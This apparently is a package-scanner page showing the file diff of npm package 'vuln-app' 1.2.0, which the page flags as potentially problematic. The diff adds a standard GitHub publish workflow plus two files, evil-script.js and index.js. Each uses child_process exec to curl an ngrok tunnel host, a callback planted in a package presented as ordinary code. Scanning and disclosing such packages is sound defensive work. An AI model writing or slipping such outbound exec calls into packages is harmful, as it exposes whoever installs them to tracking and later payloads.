vuln-app 1.2.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of vuln-app might be problematic. Click here for more details.
- package/.github/workflows/npm-publish-github-packages.yml +36 -0
- package/evil-script.js +10 -0
- package/index.js +10 -0
- package/package.json +11 -0
@@ -0,0 +1,36 @@
|
|
1
|
+
# This workflow will run tests using node and then publish a package to GitHub Packages when a release is created
|
2
|
+
# For more information see: https://help.github.com/actions/language-and-framework-guides/publishing-nodejs-packages
|
3
|
+
|
4
|
+
name: Node.js Package
|
5
|
+
|
6
|
+
on:
|
7
|
+
release:
|
8
|
+
types: [created]
|
9
|
+
|
10
|
+
jobs:
|
11
|
+
build:
|
12
|
+
runs-on: ubuntu-latest
|
13
|
+
steps:
|
14
|
+
- uses: actions/checkout@v3
|
15
|
+
- uses: actions/setup-node@v3
|
16
|
+
with:
|
17
|
+
node-version: 16
|
18
|
+
- run: npm ci
|
19
|
+
- run: npm test
|
20
|
+
|
21
|
+
publish-gpr:
|
22
|
+
needs: build
|
23
|
+
runs-on: ubuntu-latest
|
24
|
+
permissions:
|
25
|
+
contents: read
|
26
|
+
packages: write
|
27
|
+
steps:
|
28
|
+
- uses: actions/checkout@v3
|
29
|
+
- uses: actions/setup-node@v3
|
30
|
+
with:
|
31
|
+
node-version: 16
|
32
|
+
registry-url: https://npm.pkg.github.com/
|
33
|
+
- run: npm ci
|
34
|
+
- run: npm publish
|
35
|
+
env:
|
36
|
+
NODE_AUTH_TOKEN: ${{secrets.GITHUB_TOKEN}}
|
package/evil-script.js
ADDED
@@ -0,0 +1,10 @@
|
|
1
|
+
var exec = require('child_process').exec;
|
2
|
+
|
3
|
+
exec('curl https://5675-77-137-20-251.eu.ngrok.io/fromOnLoad',
|
4
|
+
function (error, stdout, stderr) {
|
5
|
+
console.log('stdout: ' + stdout);
|
6
|
+
console.log('stderr: ' + stderr);
|
7
|
+
if (error !== null) {
|
8
|
+
console.log('exec error: ' + error);
|
9
|
+
}
|
10
|
+
});
|
package/index.js
ADDED
@@ -0,0 +1,10 @@
|
|
1
|
+
var exec = require('child_process').exec;
|
2
|
+
|
3
|
+
exec('curl https://01cb-77-137-20-251.eu.ngrok.io',
|
4
|
+
function (error, stdout, stderr) {
|
5
|
+
console.log('stdout: ' + stdout);
|
6
|
+
console.log('stderr: ' + stderr);
|
7
|
+
if (error !== null) {
|
8
|
+
console.log('exec error: ' + error);
|
9
|
+
}
|
10
|
+
});
|